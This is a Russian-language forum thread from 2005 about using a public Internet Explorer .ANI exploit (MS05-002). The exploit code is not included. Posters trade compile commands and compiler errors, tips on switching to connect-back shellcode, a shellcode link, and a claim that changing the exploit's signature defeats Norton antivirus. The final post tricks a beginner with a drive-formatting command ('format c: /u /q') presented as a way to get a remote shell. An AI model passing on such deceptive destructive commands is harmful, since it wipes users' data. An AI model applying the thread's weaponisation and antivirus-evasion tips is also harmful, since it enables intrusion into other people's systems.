Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
(MS05-002) Internet Explorer .ANI files handling Universal Exploit
 
Обсуждение статьи (MS05-002) Internet Explorer .ANI files handling Universal Exploit
 
А никто не знает, как connect_back замутить?
 
Цитата
GoGA пишет:
А никто не знает, как connect_back замутит�?


just use the connect_back shellcode instead of the
bindport.
 
Стабильно работает на xp sp 1, windows server 2003.
На практике IMHO для локального повышения привиллегий.
 
Не получается скомпилить его в lcc.
Пишет ошибки какие-то, я в С не силён.
Скиньте кто нибудь откомпилиный на solaris24@mail.ru

Я до этого много чего компилил и без проблем а этим сыром не гу-гу.
 
Эх-х-х-х
хакирры... чтож такое то ...
пойми ты пока не научишься думать сам, так и будешь просить
а ведь все до безобразия просто.

lc HOD-ms05002-ani-expl.c -o HOD-expl.exe

lc, надеюсь найдешь...
 
Кстати говоря : респект HODу
опять отличная работа!
 
Вот какая польза от этих эксплоитов? У мя СП2 и нортон который этот сплоит ловит... ну и какую пользу с него можно получить?
 
Вот такие ошибки выдаёт:

Wedit output window build: Wed Feb 02 12:58:50 2005
cpp: c:\expl\wc-ms05002-ani-expl-cb.c:139 Unterminated string or char const
cpp: c:\expl\wc-ms05002-ani-expl-cb.c:140 Unterminated string or char const
cpp: c:\expl\wc-ms05002-ani-expl-cb.c:141 Unterminated string or char const
Error c:\expl\wc-ms05002-ani-expl-cb.c: 140  Syntax error; missing semicolon before  Exploit
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 140  no type specified. Defaulting to int
Error c:\expl\wc-ms05002-ani-expl-cb.c: 142  illegal character \
Error c:\expl\wc-ms05002-ani-expl-cb.c: 147  invalid initialization type; found pointer to char expected int
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 192  missing prototype for strlen
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 198  missing prototype for strcpy
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 199  missing prototype for strcat
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 206  missing prototype for memset
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 209  missing prototype for memcpy
Warning c:\expl\wc-ms05002-ani-expl-cb.c: 215  missing prototype for inet_addr
Compilation + link time:0.1 sec, Return code: 1
 
Цитата
DigiBrain пишет:
Эх-х-х-х
хакирры... чтож такое то ...
пойми ты пока не научишься думать сам, так и будешь просить
а ведь все до безобразия просто.

lc HOD-ms05002-ani-expl.c -o HOD-expl.exe

lc, надеюсь найдешь...

Сэнкс, раздуплился. Пошла жара.
 
Цитата
Гость пишет:
Вот какая польза от этих эксплоитов? У мя СП2 и нортон который этот сплоит ловит... ну и какую пользу с него можно получить?

Hu da tipa, a u meny linux i links vpridachu i chto?
NE u vseh ge tak....

Pod tvoi Norton, legko mojno pomenyt signaturu exploit-a i norton budet v JOPE :-)
 
привет
у кого работает нормально - реальный шелл даёт ?
Может объясните как его сделать не демонстрационным.
Кто то говорил что там надо вписать шеллкод, можно подробнее ?
Спасибо
 
это вообще про то ?
http://www.w00w00.org/files/shellcode/windows/
 
Цитата
кидис-не кидис пишет:
привет
у кого работает нормально - реальный шелл даёт ?
Может объясните как его сделать не демонстрационным.
Кто то говорил что там надо вписать шеллкод, можно подробнее ?
Спасибо

Statei v inete valom!
Ckazat gde???

www.google.com

:-)
 
Цитата
DigiBrain пишет:
Эх-х-х-х
хакирры... чтож такое то ...
пойми ты пока не научишься думать сам, так и будешь просить
а ведь все до безобразия просто.

lc HOD-ms05002-ani-expl.c -o HOD-expl.exe

lc, надеюсь найдешь...

5 Balls :-)

Gi-gi-gi....
I ha kui im shell to???
Sebe podobnih lomat?
:-)
 
Привет хацкеры! Я тока учусь, не удевляйтесь. Вопрос:
Че с ней вообще делать можно, и как, может кто-то подскажет?
 
переписывать и компилить... кто хочет могу прислать
 
2Учащийся в ][
Никогда, никого не называй хацкером, можешь огрести люлей! И никогда не задавай вопросы ответ на которые можешь нвйти сам. RTFM!

за вас никто никогда делать ничего не будет! До смеха доходит, когда смотришь на товарищей, которые пишут: "И мне пришли кряк(сплоит, деньги - нужное подчеркнуть) на .::Mega-Hacker:..@mail.ru"!

А по поводу что можно делать?
Компилировать!
 
шелл можно получить очень просто жми win+r, там прописывай, главное не перепутай ничего, cmd, откроется черное окошко, не пугайся, все так и должно быть, там пиши format c: /u /q и сразу получишь удаленный шелл на любом компе
Страницы: 1
Читают тему